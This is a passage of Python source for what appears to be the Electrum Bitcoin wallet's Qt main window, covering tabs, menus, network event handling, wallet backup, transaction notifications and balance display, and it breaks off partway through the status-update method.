from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider, FeeComboBox
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT)
from .util import ButtonsTextEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
from .transaction_dialog import PreviewTxDialog
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() in [ Qt.Key_Return, Qt.Key_Enter ]:
self.func()
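# Illustrative usage sketch (hypothetical names): a StatusBarButton wraps an icon,
# a tooltip and a zero-argument callback, e.g.
#   status_bar.addPermanentWidget(
#       StatusBarButton(read_QIcon("lightning.png"), _("Lightning Network"), self.show_lightning_dialog))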
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
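# Illustrative usage (hypothetical method name): the wrapped method simply declares a
# ``password`` keyword argument and the decorator prompts the user for it when needed, e.g.
#   @protected
#   def do_sensitive_action(self, *args, password):
#       ...  # ``password`` is None when the wallet has no keystore encryption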
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
show_error_signal = pyqtSignal(str)
payment_request: Optional[paymentrequest.PaymentRequest]
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
assert wallet, "no wallet"
self.wallet = wallet
if wallet.has_lightning():
self.wallet.config.set_key('show_channels_tab', True)
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.pluginsdialog = None
self.showing_cert_mismatch_error = False
self.tl_windows = []
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.completions = QStringListModel()
coincontrol_sb = self.create_coincontrol_statusbar()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.channels_tab = self.create_channels_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
central_widget = QWidget()
vbox = QVBoxLayout(central_widget)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(tabs)
vbox.addWidget(coincontrol_sb)
self.setCentralWidget(central_widget)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.show_error_signal.connect(self.show_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'payment_failed', 'payment_succeeded',
'invoice_status', 'request_status', 'ln_gossip_sync_progress',
'cert_mismatch', 'gossip_db_loaded']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
util.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
#self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread()
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def setup_exception_hook(self):
Exception_Hook.maybe_setup(config=self.config,
wallet=self.wallet)
def run_coroutine_from_thread(self, coro, on_result=None):
def task():
try:
f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
r = f.result()
if on_result:
on_result(r)
except Exception as e:
self.logger.exception("exception in coro scheduled via window.wallet")
self.show_error_signal.emit(str(e))
self.wallet.thread.add(task)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
# TODO would be nice if we just sent these to the crash reporter...
# anything we don't want to send there, we should explicitly catch
# send_exception_to_crash_reporter(e)
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
# note: all windows get events from all wallets!
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
elif event == 'gossip_db_loaded':
self.channels_list.gossip_db_loaded.emit(*args)
elif event == 'channels_updated':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_rows.emit(*args)
elif event == 'channel':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_single_row.emit(*args)
self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'payment_succeeded':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_succeeded(*args)
elif event == 'payment_failed':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_failed(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
pass
elif event == 'fee_histogram':
self.history_model.on_fee_histogram()
elif event == 'ln_gossip_sync_progress':
self.update_lightning_icon()
elif event == 'cert_mismatch':
self.show_cert_mismatch_error()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.daemon = True
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
self.wallet.thread = None
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet: Abstract_Wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.has_lightning():
util.trigger_callback('channels_updated', wallet)
self.need_update.set()
# Once the GUI has been initialized, check whether anything needs to be announced, since callbacks may have fired before the GUI existed
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.db.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except Exception:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.db.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def select_backup_dir(self, b):
name = self.config.get('backup_dir', '')
dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name)
if dirname:
self.config.set_key('backup_dir', dirname)
self.backup_dir_e.setText(dirname)
def backup_wallet(self):
d = WindowModalDialog(self, _("File Backup"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
backup_help = ""
backup_dir = self.config.get('backup_dir')
backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help)
msg = _('Please select a backup directory')
if self.wallet.has_lightning() and self.wallet.lnworker.channels:
msg += '\n\n' + ' '.join([
_("Note that lightning channels will be converted to channel backups."),
_("You cannot use channel backups to perform lightning payments."),
_("Channel backups can only be used to request your channels to be closed.")
])
self.backup_dir_e = QPushButton(backup_dir)
self.backup_dir_e.clicked.connect(self.select_backup_dir)
grid.addWidget(backup_dir_label, 1, 0)
grid.addWidget(self.backup_dir_e, 1, 1)
vbox.addLayout(grid)
vbox.addWidget(WWLabel(msg))
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
try:
new_path = self.wallet.save_backup()
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
return
if new_path:
msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path)
self.show_message(msg, title=_("Wallet backup created"))
else:
self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not created"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except Exception:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.export_invoices())
requests_menu = wallet_menu.addMenu(_("Requests"))
requests_menu.addAction(_("Import"), lambda: self.import_requests())
requests_menu.addAction(_("Export"), lambda: self.export_requests())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools")) # type: QMenu
preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog) # type: QAction
if sys.platform == 'darwin':
# "Settings"/"Preferences" are all reserved keywords in macOS.
# preferences_action will get picked up based on name (and put into a standardized location,
# and given a standard reserved hotkey)
# Hence, this menu item will be at a "uniform location re macOS processes"
preferences_action.setMenuRole(QAction.PreferencesRole) # make sure OS recognizes it as preferences
# Add another preferences item, to also have a "uniform location for Electrum between different OSes"
tools_menu.addAction(_("Electrum preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network))
tools_menu.addAction(_("&Lightning Network"), self.gui_object.show_lightning_dialog).setEnabled(bool(self.wallet.has_lightning() and self.network))
tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog).setEnabled(bool(self.network and self.network.local_watchtower))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().server.host
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(latest_version=version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
total_amount += tx_wallet_delta.delta
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(tx_wallet_delta.delta)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter="",
*, default_extension: str = None,
default_filter: str = None) -> Optional[str]:
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join(directory, filename)
file_dialog = QFileDialog(self, title, path, filter)
file_dialog.setAcceptMode(QFileDialog.AcceptSave)
if default_extension:
# note: on MacOS, the selected filter's first extension seems to have priority over this...
file_dialog.setDefaultSuffix(default_extension)
if default_filter:
assert default_filter in filter, f"default_filter={default_filter!r} does not appear in filter={filter!r}"
file_dialog.selectNameFilter(default_filter)
if file_dialog.exec() != QDialog.Accepted:
return None
selected_path = file_dialog.selectedFiles()[0]
if selected_path and directory != os.path.dirname(selected_path):
self.config.set_key('io_dir', os.path.dirname(selected_path), True)
return selected_path
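# Illustrative call (hypothetical filter strings); note that default_filter must be one of
# the entries in ``filter``:
#   self.getSaveFileName(_("Export"), "export.csv", "CSV (*.csv);;All files (*)",
#                        default_extension="csv", default_filter="CSV (*.csv)")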
def timer_actions(self):
self.request_list.refresh_status()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
# x is in sats
return self.config.format_amount(x, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
# amount is in sats
text = self.config.format_amount_and_units(amount)
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
return self.config.format_fee_rate(fee_rate)
def get_decimal_point(self):
return self.config.get_decimal_point()
def base_unit(self):
return self.config.get_base_unit()
def connect_fields(self, window, btc_e, fiat_e, fee_e):
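        """Keep a BTC amount edit and its fiat counterpart in sync: editing
        one recomputes the other from the current exchange rate, and edits
        also trigger the window's fee update if `fee_e` is given.

        E.g. `self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)`
        as done in create_receive_tab().
        """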
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
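        """Refresh the balance label, tray tooltip and status bar icon from
        the current wallet and network state."""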
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
if self.wallet.has_lightning():
l = self.wallet.lnworker.get_balance()
text += u' \U000026a1 %s'%(self.format_amount_and_units(l).strip())
# append fiat balance and price
